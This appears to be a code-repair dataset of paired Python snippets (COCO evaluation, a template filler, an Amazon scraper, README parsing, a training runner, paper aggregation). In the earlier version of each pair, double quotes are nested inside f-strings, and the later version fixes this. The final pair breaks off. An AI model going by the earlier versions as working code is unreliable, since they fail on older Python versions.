assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
result_files = self.results2json(results, jsonfile_prefix)
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
classwise=True,
proposal_nums=(1, 10, 100),
iou_thrs=None,
usb_eval=True,
area_range_type='absolute_scale_ap'):
"""Evaluation in COCO protocol.
Args:
results (list[list | tuple]): Testing results of the dataset.
metric (str | list[str]): Metrics to be evaluated. Options are
'bbox', 'segm', 'proposal', 'proposal_fast'.
logger (logging.Logger | str | None): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str | None): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
classwise (bool): Whether to evaluating the AP for each class.
proposal_nums (Sequence[int]): Proposal number used for evaluating
recalls, such as recall@100, recall@1000.
Default: (100, 300, 1000).
iou_thrs (Sequence[float], optional): IoU threshold used for
evaluating recalls/mAPs. If set to a list, the average of all
IoUs will also be computed. If not specified, [0.50, 0.55,
0.60, 0.65, 0.70, 0.75, 0.80, 0.85, 0.90, 0.95] will be used.
Default: None.
area_range_type (str, optional): Type of area range to compute
scale-wise AP metrics. Default: 'COCO'.
Returns:
dict[str, float]: COCO style evaluation metric.
"""
metrics = metric if isinstance(metric, list) else [metric]
allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
for metric in metrics:
if metric not in allowed_metrics:
raise KeyError(f'metric {metric} is not supported')
if iou_thrs is None:
iou_thrs = np.linspace(.5, 0.95, int(np.round((0.95 - .5) / .05)) + 1, endpoint=True)
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
eval_results = OrderedDict()
cocoGt = self.coco
for metric in metrics:
msg = f'Evaluating {metric}...'
if logger is None:
msg = '\n' + msg
print_log(msg, logger=logger)
if metric == 'proposal_fast':
ar = self.fast_eval_recall(
results, proposal_nums, iou_thrs, logger='silent')
log_msg = []
for i, num in enumerate(proposal_nums):
eval_results[f'AR@{num}'] = ar[i]
log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
log_msg = ''.join(log_msg)
print_log(log_msg, logger=logger)
continue
iou_type = 'bbox' if metric == 'proposal' else metric
if metric not in result_files:
raise KeyError(f'{metric} is not in results')
try:
predictions = mmcv.load(result_files[metric])
if iou_type == 'segm':
# Refer to https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocotools/coco.py#L331 # noqa
# When evaluating mask AP, if the results contain bbox, cocoapi will use the box area instead of the mask area for calculating the instance area. Though the overall AP is not affected, this leads to different small/medium/large mask AP results.
for x in predictions:
x.pop('bbox')
warnings.simplefilter('once')
warnings.warn('The key "bbox" is deleted for more accurate mask AP of small/medium/large instances since v2.12.0. This does not change the overall mAP calculation.',
UserWarning)
cocoDt = cocoGt.loadRes(predictions)
except IndexError:
print_log(
'The testing results of the whole dataset is empty.',
logger=logger,
level=logging.ERROR)
break
cocoEval = USBeval(cocoGt, cocoDt, iou_type, area_range_type=area_range_type)
cocoEval.params.catIds = self.cat_ids
cocoEval.params.imgIds = self.img_ids
cocoEval.params.maxDets = list(proposal_nums)
cocoEval.params.iouThrs = iou_thrs
if metric == 'proposal':
cocoEval.params.useCats = 0
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
for key, val in cocoEval.stats.items():
if key.startswith('mAP'):
key = f'{metric}_{key}'
eval_results[key] = float(f'{val:.4f}')
else:
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
for key, val in cocoEval.stats.items():
if key.startswith('mAP'):
key = f'{metric}_{key}'
eval_results[key] = float(f'{val:.4f}')
if classwise: # Compute per-category AP
# Compute per-category AP
# from https://github.com/facebookresearch/detectron2/
precisions = cocoEval.eval['precision']
aps = []
# precision: (iou, recall, cls, area range, max dets)
assert len(self.cat_ids) == precisions.shape[2]
results_per_category = []
for idx, catId in enumerate(self.cat_ids):
# area range index 0: all area ranges
# max dets index -1: typically 100 per image
nm = self.coco.loadCats(catId)[0]
precision = precisions[:, :, idx, 0, -1]
precision = precision[precision > -1]
if precision.size:
ap = np.mean(precision)
else:
ap = float('nan')
aps.append(ap)
results_per_category.append((f'{nm["name"]}', f'{float(ap):0.4f}'))
eval_results['AP_per_class'] = aps
num_columns = min(6, len(results_per_category) * 2)
results_flatten = list(
itertools.chain(*results_per_category))
headers = ['category', 'AP'] * (num_columns // 2)
results_2d = itertools.zip_longest(*[
results_flatten[i::num_columns]
for i in range(num_columns)
])
table_data = [headers]
table_data += [result for result in results_2d]
table = AsciiTable(table_data)
print_log('\n' + table.table, logger=logger)
try:
copypastes = []
coco_metrics = ['mAP', 'mAP_50', 'mAP_75', 'mAP_s', 'mAP_m', 'mAP_l']
for coco_metric in coco_metrics:
copypastes.append(f'{cocoEval.stats[coco_metric]:.4f}')
mAP_copypaste = ' '.join(copypastes)
eval_results[f'{metric}_mAP_copypaste'] = mAP_copypaste
except KeyError:
pass
if tmp_dir is not None:
tmp_dir.cleanup()
return eval_results |
import argparse
from pathlib import Path
IMAGE_STORE_INIT = "image_store = ImageStore(provider=PROVIDER)"
AUDIO_STORE_INIT = "audio_store = AudioStore(provider=PROVIDER)"
TEMPLATES_PATH = Path(__file__).parent
REPO_PATH = TEMPLATES_PATH.parents[1]
PROJECT_PATH = REPO_PATH.parent
def _get_filled_template(template_path: Path, provider: str, media_type: str):
with template_path.open("r", encoding="utf-8") as template:
template_string = template.read()
script_string = (
template_string.replace("{provider_title_case}", provider.title())
.replace("{provider_upper_case}", provider.upper())
.replace("{provider}", provider.lower())
)
if media_type == "audio":
media_store_init = AUDIO_STORE_INIT
media_store = "audio_store"
else:
media_store_init = IMAGE_STORE_INIT
media_store = "image_store"
script_string = (
script_string.replace("media_store_init", media_store_init)
.replace("{media_store}", media_store)
.replace("{media_type}", media_type)
)
return script_string
def _render_file(
target: Path,
template_path: Path,
provider: str,
media_type: str,
name: str,
):
with target.open("w", encoding="utf-8") as target_file:
filled_template = _get_filled_template(template_path, provider, media_type)
target_file.write(filled_template)
print(f"{name + ":":<18} {target.relative_to(PROJECT_PATH)}")
def fill_template(provider, media_type):
print(f"Creating files in {REPO_PATH}")
dags_path = TEMPLATES_PATH.parent / "dags"
api_path = dags_path / "provider_api_scripts"
filename = provider.replace(" ", "_").lower()
# Render the API file itself
script_template_path = TEMPLATES_PATH / "template_provider.py_template"
api_script_path = api_path / f"{filename}.py"
_render_file(
api_script_path, script_template_path, provider, media_type, "API script"
)
# Render the DAG workflow
workflow_template_path = TEMPLATES_PATH / "workflow.py_template"
workflow_path = dags_path / f"{filename}_workflow.py"
_render_file(
workflow_path,
workflow_template_path,
provider,
media_type,
"Airflow DAG",
)
# Render the tests
script_template_path = TEMPLATES_PATH / "template_test.py_template"
tests_path = REPO_PATH / "tests"
# Mirror the directory structure, but under the "tests" top level directory
test_script_path = tests_path.joinpath(*api_path.parts[-2:]) / f"test_{filename}.py"
_render_file(
test_script_path, script_template_path, provider, media_type, "API script test"
)
print(
"""
NOTE: You will also need to add the Airflow workflow file to the WORKFLOWS list in the \
DAG parsing test file (openverse-catalog/tests/dags/test_dag_parsing.py).
"""
)
def main():
parser = argparse.ArgumentParser(
description="Create a new provider API script",
add_help=True,
)
parser.add_argument(
"provider", help='Create the script for this provider (eg. "Wikimedia").'
)
parser.add_argument(
"-m",
"--media",
type=str,
choices=["image", "audio"],
help="Script will collect media of this type"
" ('audio'/'image'). Default value is 'image'",
)
args = parser.parse_args()
provider = args.provider
media_type = args.media
if media_type not in ["audio", "image"]:
print("No media type given, assuming it's `image`")
media_type = "image"
fill_template(provider, media_type)
if __name__ == "__main__":
main()
| import argparse
from pathlib import Path
IMAGE_STORE_INIT = "image_store = ImageStore(provider=PROVIDER)"
AUDIO_STORE_INIT = "audio_store = AudioStore(provider=PROVIDER)"
TEMPLATES_PATH = Path(__file__).parent
REPO_PATH = TEMPLATES_PATH.parents[1]
PROJECT_PATH = REPO_PATH.parent
def _get_filled_template(template_path: Path, provider: str, media_type: str):
with template_path.open("r", encoding="utf-8") as template:
template_string = template.read()
script_string = (
template_string.replace("{provider_title_case}", provider.title())
.replace("{provider_upper_case}", provider.upper())
.replace("{provider}", provider.lower())
)
if media_type == "audio":
media_store_init = AUDIO_STORE_INIT
media_store = "audio_store"
else:
media_store_init = IMAGE_STORE_INIT
media_store = "image_store"
script_string = (
script_string.replace("media_store_init", media_store_init)
.replace("{media_store}", media_store)
.replace("{media_type}", media_type)
)
return script_string
def _render_file(
target: Path,
template_path: Path,
provider: str,
media_type: str,
name: str,
):
with target.open("w", encoding="utf-8") as target_file:
filled_template = _get_filled_template(template_path, provider, media_type)
target_file.write(filled_template)
print(f"{name + ':':<18} {target.relative_to(PROJECT_PATH)}")
def fill_template(provider, media_type):
print(f"Creating files in {REPO_PATH}")
dags_path = TEMPLATES_PATH.parent / "dags"
api_path = dags_path / "provider_api_scripts"
filename = provider.replace(" ", "_").lower()
# Render the API file itself
script_template_path = TEMPLATES_PATH / "template_provider.py_template"
api_script_path = api_path / f"{filename}.py"
_render_file(
api_script_path, script_template_path, provider, media_type, "API script"
)
# Render the DAG workflow
workflow_template_path = TEMPLATES_PATH / "workflow.py_template"
workflow_path = dags_path / f"{filename}_workflow.py"
_render_file(
workflow_path,
workflow_template_path,
provider,
media_type,
"Airflow DAG",
)
# Render the tests
script_template_path = TEMPLATES_PATH / "template_test.py_template"
tests_path = REPO_PATH / "tests"
# Mirror the directory structure, but under the "tests" top level directory
test_script_path = tests_path.joinpath(*api_path.parts[-2:]) / f"test_{filename}.py"
_render_file(
test_script_path, script_template_path, provider, media_type, "API script test"
)
print(
"""
NOTE: You will also need to add the Airflow workflow file to the WORKFLOWS list in the \
DAG parsing test file (openverse-catalog/tests/dags/test_dag_parsing.py).
"""
)
def main():
parser = argparse.ArgumentParser(
description="Create a new provider API script",
add_help=True,
)
parser.add_argument(
"provider", help='Create the script for this provider (eg. "Wikimedia").'
)
parser.add_argument(
"-m",
"--media",
type=str,
choices=["image", "audio"],
help="Script will collect media of this type"
" ('audio'/'image'). Default value is 'image'",
)
args = parser.parse_args()
provider = args.provider
media_type = args.media
if media_type not in ["audio", "image"]:
print("No media type given, assuming it's `image`")
media_type = "image"
fill_template(provider, media_type)
if __name__ == "__main__":
main()
|
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import json
from datetime import datetime
from jsonReport import GeneratejsonReport
class AmazonAPI:
def __init__(self, search_term, filters, base_url, currency):
self.base_url = base_url
self.search_term = search_term
options = webdriver.ChromeOptions()
# set_automation_as_head_less(options)
# options.add_argument('--headless')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--incognito')
self.driver = webdriver.Chrome(
"./chromedriver", chrome_options=options)
self.currency = currency
self.price_filter = f"&rh=p_36%3A{filters["min"]}00-{filters["max"]}00"
def run(self):
print("Starting Script...")
print(f"Looking for {self.search_term} products...")
links = self.get_products_links()
if not links:
print("Stopped script.")
return
print(f"Got {len(links)} links to products...")
print("Getting info about products...")
products = self.get_products_info(links)
print(f"Got info about {len(products)} products...")
self.driver.quit()
return products
def get_products_links(self):
self.driver.get(self.base_url)
element = self.driver.find_element_by_xpath(
'//*[@id="twotabsearchtextbox"]')
element.send_keys(self.search_term)
element.send_keys(Keys.ENTER)
time.sleep(2) # wait to load page
self.driver.get(f'{self.driver.current_url}{self.price_filter}')
print(f"Our url: {self.driver.current_url}")
time.sleep(2) # wait to load page
result_list = self.driver.find_elements_by_class_name('s-result-list')
# result_list = self.driver.find_elements_by_class_name('s-search-results')
links = []
try:
results = result_list[0].find_elements_by_xpath(
"//div/span/div/div/div[2]/div[2]/div/div[1]/div/div/div[1]/h2/a")
links = [link.get_attribute('href') for link in results]
return links
except Exception as e:
print("Didn't get any products...")
print(e)
return links
def get_products_info(self, links):
asins = self.get_asins(links)
products = []
for asin in asins:
product = self.get_single_product_info(asin)
if product:
products.append(product)
return products
def get_asins(self, links):
return [self.get_asin(link) for link in links]
def get_single_product_info(self, asin):
print(f"Product ID: {asin} - getting data...")
product_short_url = self.shorten_url(asin)
self.driver.get(f'{product_short_url}?language=en_GB')
time.sleep(2)
title = self.get_title()
seller = self.get_seller()
price = self.get_price()
if title and seller and price:
product_info = {
'asin': asin,
'url': product_short_url,
'title': title,
'seller': seller,
'price': price
}
return product_info
return None
def get_title(self):
try:
return self.driver.find_element_by_id('productTitle').text
except Exception as e:
print(e)
print(f"Can't get title of a product - {self.driver.current_url}")
return None
def get_seller(self):
try:
return self.driver.find_element_by_id('bylineInfo').text
except Exception as e:
print(e)
print(f"Can't get seller of a product - {self.driver.current_url}")
return None
def get_price(self):
price = None
try:
price = self.driver.find_element_by_id('priceblock_ourprice').text
price = self.convert_price(price)
except NoSuchElementException:
try:
availability = self.driver.find_element_by_id(
'availability').text
if 'Available' in availability:
price = self.driver.find_element_by_class_name(
'olp-padding-right').text
price = price[price.find(self.currency):]
price = self.convert_price(price)
except Exception as e:
print(e)
print(
f"Can't get price of a product - {self.driver.current_url}")
return None
except Exception as e:
print(e)
print(f"Can't get price of a product - {self.driver.current_url}")
return None
return price
@staticmethod
def get_asin(product_link):
return product_link[product_link.find('/dp/') + 4:product_link.find('/ref')]
def shorten_url(self, asin):
return self.base_url + 'dp/' + asin
def convert_price(self, price):
price = price.split(self.currency)[1]
try:
price = price.split("\n")[0] + "." + price.split("\n")[1]
except:
Exception()
try:
price = price.split(",")[0] + price.split(",")[1]
except:
Exception()
return float(price)
if __name__ == '__main__':
#DIRECTORY = 'reports'
NAME = input("Enter the name of the product you want to search: ")
CURRENCY = '₹'
MIN_PRICE = input("The minimum price you can afford: ")
MAX_PRICE = input("The maximum price you can afford: ")
FILTERS = {
'min': MIN_PRICE,
'max': MAX_PRICE
}
BASE_URL = "http://www.amazon.in/"
am = AmazonAPI(NAME, FILTERS, BASE_URL, CURRENCY)
data = am.run()
GeneratejsonReport(NAME, FILTERS, BASE_URL, CURRENCY, data)
| import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import json
from datetime import datetime
from jsonReport import GeneratejsonReport
class AmazonAPI:
def __init__(self, search_term, filters, base_url, currency):
self.base_url = base_url
self.search_term = search_term
options = webdriver.ChromeOptions()
# set_automation_as_head_less(options)
# options.add_argument('--headless')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--incognito')
self.driver = webdriver.Chrome(
"./chromedriver", chrome_options=options)
self.currency = currency
self.price_filter = f"&rh=p_36%3A{filters['min']}00-{filters['max']}00"
def run(self):
print("Starting Script...")
print(f"Looking for {self.search_term} products...")
links = self.get_products_links()
if not links:
print("Stopped script.")
return
print(f"Got {len(links)} links to products...")
print("Getting info about products...")
products = self.get_products_info(links)
print(f"Got info about {len(products)} products...")
self.driver.quit()
return products
def get_products_links(self):
self.driver.get(self.base_url)
element = self.driver.find_element_by_xpath(
'//*[@id="twotabsearchtextbox"]')
element.send_keys(self.search_term)
element.send_keys(Keys.ENTER)
time.sleep(2) # wait to load page
self.driver.get(f'{self.driver.current_url}{self.price_filter}')
print(f"Our url: {self.driver.current_url}")
time.sleep(2) # wait to load page
result_list = self.driver.find_elements_by_class_name('s-result-list')
# result_list = self.driver.find_elements_by_class_name('s-search-results')
links = []
try:
results = result_list[0].find_elements_by_xpath(
"//div/span/div/div/div[2]/div[2]/div/div[1]/div/div/div[1]/h2/a")
links = [link.get_attribute('href') for link in results]
return links
except Exception as e:
print("Didn't get any products...")
print(e)
return links
def get_products_info(self, links):
asins = self.get_asins(links)
products = []
for asin in asins:
product = self.get_single_product_info(asin)
if product:
products.append(product)
return products
def get_asins(self, links):
return [self.get_asin(link) for link in links]
def get_single_product_info(self, asin):
print(f"Product ID: {asin} - getting data...")
product_short_url = self.shorten_url(asin)
self.driver.get(f'{product_short_url}?language=en_GB')
time.sleep(2)
title = self.get_title()
seller = self.get_seller()
price = self.get_price()
if title and seller and price:
product_info = {
'asin': asin,
'url': product_short_url,
'title': title,
'seller': seller,
'price': price
}
return product_info
return None
def get_title(self):
try:
return self.driver.find_element_by_id('productTitle').text
except Exception as e:
print(e)
print(f"Can't get title of a product - {self.driver.current_url}")
return None
def get_seller(self):
try:
return self.driver.find_element_by_id('bylineInfo').text
except Exception as e:
print(e)
print(f"Can't get seller of a product - {self.driver.current_url}")
return None
def get_price(self):
price = None
try:
price = self.driver.find_element_by_id('priceblock_ourprice').text
price = self.convert_price(price)
except NoSuchElementException:
try:
availability = self.driver.find_element_by_id(
'availability').text
if 'Available' in availability:
price = self.driver.find_element_by_class_name(
'olp-padding-right').text
price = price[price.find(self.currency):]
price = self.convert_price(price)
except Exception as e:
print(e)
print(
f"Can't get price of a product - {self.driver.current_url}")
return None
except Exception as e:
print(e)
print(f"Can't get price of a product - {self.driver.current_url}")
return None
return price
@staticmethod
def get_asin(product_link):
return product_link[product_link.find('/dp/') + 4:product_link.find('/ref')]
def shorten_url(self, asin):
return self.base_url + 'dp/' + asin
def convert_price(self, price):
price = price.split(self.currency)[1]
try:
price = price.split("\n")[0] + "." + price.split("\n")[1]
except:
Exception()
try:
price = price.split(",")[0] + price.split(",")[1]
except:
Exception()
return float(price)
if __name__ == '__main__':
#DIRECTORY = 'reports'
NAME = input("Enter the name of the product you want to search: ")
CURRENCY = '₹'
MIN_PRICE = input("The minimum price you can afford: ")
MAX_PRICE = input("The maximum price you can afford: ")
FILTERS = {
'min': MIN_PRICE,
'max': MAX_PRICE
}
BASE_URL = "http://www.amazon.in/"
am = AmazonAPI(NAME, FILTERS, BASE_URL, CURRENCY)
data = am.run()
GeneratejsonReport(NAME, FILTERS, BASE_URL, CURRENCY, data)
|
import os
import json
config_path = '/home/work/PycharmProjects/mmsegmentation/configs'
path2drafts = '/home/work/PycharmProjects/mmsegmentation/supervisely/train/src_backup'
txt_ = os.path.join(path2drafts, 'cleared_tables')
os.makedirs(txt_, exist_ok=True)
json_ = os.path.join(path2drafts, 'dirty_json')
os.makedirs(json_, exist_ok=True)
global_dict = {}
for path, folder, file in os.walk(config_path):
# print(path, folder, file)
if 'README.md' in file:
model_kind = path.split('/')[-1]
py_configs_list = [f for f in file if '.py' in f]
if py_configs_list.__len__() > 0:
datasets = set([d.split('_')[-1].strip('.py') for d in py_configs_list])
dataset = datasets.pop()
else:
dataset = None
print(path, model_kind, dataset, file)
with open(os.path.join(path, 'README.md'), 'r') as file_to_read:
txt = file_to_read.read()
print(txt)
cleared_lines = [i for i in txt.split('\n') if i.startswith('|')]
with open(f'{txt_}/{model_kind}.txt', 'w') as file_to_write:
for line in cleared_lines:
file_to_write.write(line+'\n') # file_to_write.writelines(cleared_lines)
files = sorted(os.listdir(txt_))
js = [] # [i.replace('.json', '') for i in sorted(os.listdir(json_))]
queued_files = [file for file in files if file.replace('.txt', '') not in js]
for file in queued_files:
with open(os.path.join(txt_, file), 'r') as file_to_read:
data = file_to_read.read()
cleared_lines = data.split('\n')
if 'regnet' in file:
print(file)
checked = False
archs = []
for line in cleared_lines:
if 'Download' in line or 'Config' in line or 'Backbone' in line:
headers = [i.strip() for i in line.split('|') if i != '']
checked = True
if '[config]' in line:
line = line.replace('||', '| - |')
data = [i.strip() for i in line.split('|') if i != '']
try:
assert len(headers) == len(data)
except:
data.append('')
new_dict = {}
for head, col_data in zip(headers, data):
value = col_data.strip('[config]()').strip('[model]()')
if ') |' in value:
value = value.split(') |')[0]
new_dict[head] = value
archs.append(new_dict)
with open(f"{json_}/{file.replace(".txt","")}.json", 'w') as file_to_write:
json.dump(obj=archs, fp=file_to_write, indent=4)
| import os
import json
config_path = '/home/work/PycharmProjects/mmsegmentation/configs'
path2drafts = '/home/work/PycharmProjects/mmsegmentation/supervisely/train/src_backup'
txt_ = os.path.join(path2drafts, 'cleared_tables')
os.makedirs(txt_, exist_ok=True)
json_ = os.path.join(path2drafts, 'dirty_json')
os.makedirs(json_, exist_ok=True)
global_dict = {}
for path, folder, file in os.walk(config_path):
# print(path, folder, file)
if 'README.md' in file:
model_kind = path.split('/')[-1]
py_configs_list = [f for f in file if '.py' in f]
if py_configs_list.__len__() > 0:
datasets = set([d.split('_')[-1].strip('.py') for d in py_configs_list])
dataset = datasets.pop()
else:
dataset = None
print(path, model_kind, dataset, file)
with open(os.path.join(path, 'README.md'), 'r') as file_to_read:
txt = file_to_read.read()
print(txt)
cleared_lines = [i for i in txt.split('\n') if i.startswith('|')]
with open(f'{txt_}/{model_kind}.txt', 'w') as file_to_write:
for line in cleared_lines:
file_to_write.write(line+'\n') # file_to_write.writelines(cleared_lines)
files = sorted(os.listdir(txt_))
js = [] # [i.replace('.json', '') for i in sorted(os.listdir(json_))]
queued_files = [file for file in files if file.replace('.txt', '') not in js]
for file in queued_files:
with open(os.path.join(txt_, file), 'r') as file_to_read:
data = file_to_read.read()
cleared_lines = data.split('\n')
if 'regnet' in file:
print(file)
checked = False
archs = []
for line in cleared_lines:
if 'Download' in line or 'Config' in line or 'Backbone' in line:
headers = [i.strip() for i in line.split('|') if i != '']
checked = True
if '[config]' in line:
line = line.replace('||', '| - |')
data = [i.strip() for i in line.split('|') if i != '']
try:
assert len(headers) == len(data)
except:
data.append('')
new_dict = {}
for head, col_data in zip(headers, data):
value = col_data.strip('[config]()').strip('[model]()')
if ') |' in value:
value = value.split(') |')[0]
new_dict[head] = value
archs.append(new_dict)
with open(f"{json_}/{file.replace('.txt','')}.json", 'w') as file_to_write:
json.dump(obj=archs, fp=file_to_write, indent=4)
|
from utils.update_hparams import update_hparams
from utils.logger import Logger
import yaml
import os
from experiments.segmentation.adversarial_network_train_val_early.data_generator import Dataset_train
from experiments.segmentation.adversarial_network_train_val_early.train_pipeline import TrainPipeline
from models.segmentation.adv_unet_train_val_early import Model
def run(
batch_size=None,
lr=None,
n_epochs=None,
gpu='1',
dropout=None,
experiment='./experiments/adversarial_network_train_val_early/config_brats_2.yml',
):
# load hyperparameters
hparams = yaml.load(open(experiment))
# crate folders
for f in [hparams['debug_path'], hparams['model_path'], hparams['checkpoint_path']]:
os.makedirs(f, exist_ok=True)
# process gpu selection string
if gpu is not None:
gpu = [int(i) for i in gpu.split(",")]
hparams = update_hparams(
hparams=hparams, dropout=dropout, batch_size=batch_size, lr=lr, n_epochs=n_epochs,
)
logger = Logger()
# run cross-val
cross_val = TrainPipeline(hparams=hparams, gpu=gpu, model=Model, Dataset_train=Dataset_train)
fold_scores_val, fold_scores_test, start_training = cross_val.train()
# save logs
logger.kpi_logger.info('=============================================')
logger.kpi_logger.info(f'Datetime = {start_training}')
logger.kpi_logger.info(f'Model metric, val = {fold_scores_val}')
logger.kpi_logger.info(f'Model metric, test = {fold_scores_test}')
logger.kpi_logger.info(f'Experiment = {experiment}')
logger.kpi_logger.info(f"Batch size = {hparams["batch_size"]}")
logger.kpi_logger.info(f"Lr = {hparams["optimizer_hparams"]["lr"]}")
logger.kpi_logger.info(f"N epochs = {hparams["n_epochs"]}")
logger.kpi_logger.info(f'GPU = {gpu}')
logger.kpi_logger.info(f"Dropout rate = {hparams["model"]["dropout_rate"]}")
logger.kpi_logger.info(f"Model name: = {hparams["model_name"]}")
logger.kpi_logger.info('=============================================')
| from utils.update_hparams import update_hparams
from utils.logger import Logger
import yaml
import os
from experiments.segmentation.adversarial_network_train_val_early.data_generator import Dataset_train
from experiments.segmentation.adversarial_network_train_val_early.train_pipeline import TrainPipeline
from models.segmentation.adv_unet_train_val_early import Model
def run(
batch_size=None,
lr=None,
n_epochs=None,
gpu='1',
dropout=None,
experiment='./experiments/adversarial_network_train_val_early/config_brats_2.yml',
):
# load hyperparameters
hparams = yaml.load(open(experiment))
# crate folders
for f in [hparams['debug_path'], hparams['model_path'], hparams['checkpoint_path']]:
os.makedirs(f, exist_ok=True)
# process gpu selection string
if gpu is not None:
gpu = [int(i) for i in gpu.split(",")]
hparams = update_hparams(
hparams=hparams, dropout=dropout, batch_size=batch_size, lr=lr, n_epochs=n_epochs,
)
logger = Logger()
# run cross-val
cross_val = TrainPipeline(hparams=hparams, gpu=gpu, model=Model, Dataset_train=Dataset_train)
fold_scores_val, fold_scores_test, start_training = cross_val.train()
# save logs
logger.kpi_logger.info('=============================================')
logger.kpi_logger.info(f'Datetime = {start_training}')
logger.kpi_logger.info(f'Model metric, val = {fold_scores_val}')
logger.kpi_logger.info(f'Model metric, test = {fold_scores_test}')
logger.kpi_logger.info(f'Experiment = {experiment}')
logger.kpi_logger.info(f"Batch size = {hparams['batch_size']}")
logger.kpi_logger.info(f"Lr = {hparams['optimizer_hparams']['lr']}")
logger.kpi_logger.info(f"N epochs = {hparams['n_epochs']}")
logger.kpi_logger.info(f'GPU = {gpu}')
logger.kpi_logger.info(f"Dropout rate = {hparams['model']['dropout_rate']}")
logger.kpi_logger.info(f"Model name: = {hparams['model_name']}")
logger.kpi_logger.info('=============================================')
|
import logging
import sys
from typing import List, Dict
import numpy as np
import pandas as pd
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def aggregate_paper(
data: List[Dict[str, str]],
start_year: int = 2016,
bins_per_year: int = 4,
filtering: bool = False,
filter_keys: List = list(),
unwanted_keys: List = list(),
return_filtered: bool = False,
filter_abstract: bool = True,
last_year: int = 2021,
):
"""Consumes a list of unstructured keyword results from a .jsonl and
aggregates papers into several bins per year.
Args:
data (List[Dict[str,str]]): Content of a .jsonl file, i.e., a list of
dictionaries, one per paper.
start_year (int, optional): First year of interest. Defaults to 2016.
bins_per_year (int, optional): Defaults to 4 (quarterly aggregation).
filtering (bool, optional): Whether or not all papers in .jsonl are
perceived as matches or whether an additional sanity checking for
the keywords is performed in abstract/title. Defaults to False.
filter_keys (list, optional): List of str used for filtering. Only
applies if filtering is True. Defaults to empty list.
unwanted_keys (list, optional): List of str that must not occur in either
title or abstract. Only applies if filtering is True.
return_filtered (bool, optional): Whether the filtered matches are also
returned. Only applies if filtering is True. Defaults to False.
filer_abstract (bool, optional): Whether the keyword is searched in the abstract
or not. Defaults to True.
last_year (int, optional): Most recent year for the aggregation. Defaults
to current year. All newer entries are discarded.
Returns:
bins (np.array): Vector of length number of years (2020 - start_year) x
bins_per_year.
"""
if not isinstance(data, list):
raise ValueError(f"Expected list, received {type(data)}")
if not isinstance(bins_per_year, int):
raise ValueError(f"Expected int, received {type(bins_per_year)}")
if 12 % bins_per_year != 0:
raise ValueError(f"Cant split year into {bins_per_year} bins")
num_years = last_year - start_year + 1
bins = np.zeros((num_years * bins_per_year))
if len(data) == 0:
return bins if not return_filtered else (bins, [])
# Remove duplicate entries (keep only the first one)
df = pd.DataFrame(data).sort_values(by="date", ascending=True)
data = df.drop_duplicates(subset="title", keep="first").to_dict("records")
dates = [dd["date"] for dd in data]
filtered = []
for paper, date in zip(data, dates):
year = int(date.split("-")[0])
if year < start_year or year > last_year:
continue
# At least one synonym per keyword needs to be in either title or
# abstract.
if filtering and filter_keys != list():
# Filter out papers which undesired terms
unwanted = False
for unwanted_key in unwanted_keys:
if unwanted_key.lower() in paper["title"].lower():
unwanted = True
if (
filter_abstract
and paper["abstract"] is not None
and unwanted_key.lower() in paper["abstract"].lower()
):
unwanted = True
if unwanted:
continue
got_keys = []
for key_term in filter_keys:
got_key = False
if not isinstance(key_term, list):
key_term = [key_term]
for key in key_term:
if key.lower() in paper["title"].lower():
got_key = True
if (
filter_abstract
and paper["abstract"] is not None
and key.lower() in paper["abstract"].lower()
):
got_key = True
got_keys.append(got_key)
if len(got_keys) != sum(got_keys):
continue
filtered.append(paper)
if len(date.split("-")) < 2:
logger.warning(
f"Paper without month {date}, randomly assigned month."
f"{paper["title"]}"
)
month = np.random.choice(12)
else:
month = int(date.split("-")[1])
year_bin = year - start_year
month_bin = int(np.floor((month - 1) / (12 / bins_per_year)))
bins[year_bin * bins_per_year + month_bin] += 1
if return_filtered:
return bins, filtered
else:
return bins
| import logging
import sys
from typing import List, Dict
import numpy as np
import pandas as pd
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def aggregate_paper(
data: List[Dict[str, str]],
start_year: int = 2016,
bins_per_year: int = 4,
filtering: bool = False,
filter_keys: List = list(),
unwanted_keys: List = list(),
return_filtered: bool = False,
filter_abstract: bool = True,
last_year: int = 2021,
):
"""Consumes a list of unstructured keyword results from a .jsonl and
aggregates papers into several bins per year.
Args:
data (List[Dict[str,str]]): Content of a .jsonl file, i.e., a list of
dictionaries, one per paper.
start_year (int, optional): First year of interest. Defaults to 2016.
bins_per_year (int, optional): Defaults to 4 (quarterly aggregation).
filtering (bool, optional): Whether or not all papers in .jsonl are
perceived as matches or whether an additional sanity checking for
the keywords is performed in abstract/title. Defaults to False.
filter_keys (list, optional): List of str used for filtering. Only
applies if filtering is True. Defaults to empty list.
unwanted_keys (list, optional): List of str that must not occur in either
title or abstract. Only applies if filtering is True.
return_filtered (bool, optional): Whether the filtered matches are also
returned. Only applies if filtering is True. Defaults to False.
filer_abstract (bool, optional): Whether the keyword is searched in the abstract
or not. Defaults to True.
last_year (int, optional): Most recent year for the aggregation. Defaults
to current year. All newer entries are discarded.
Returns:
bins (np.array): Vector of length number of years (2020 - start_year) x
bins_per_year.
"""
if not isinstance(data, list):
raise ValueError(f"Expected list, received {type(data)}")
if not isinstance(bins_per_year, int):
raise ValueError(f"Expected int, received {type(bins_per_year)}")
if 12 % bins_per_year != 0:
raise ValueError(f"Cant split year into {bins_per_year} bins")
num_years = last_year - start_year + 1
bins = np.zeros((num_years * bins_per_year))
if len(data) == 0:
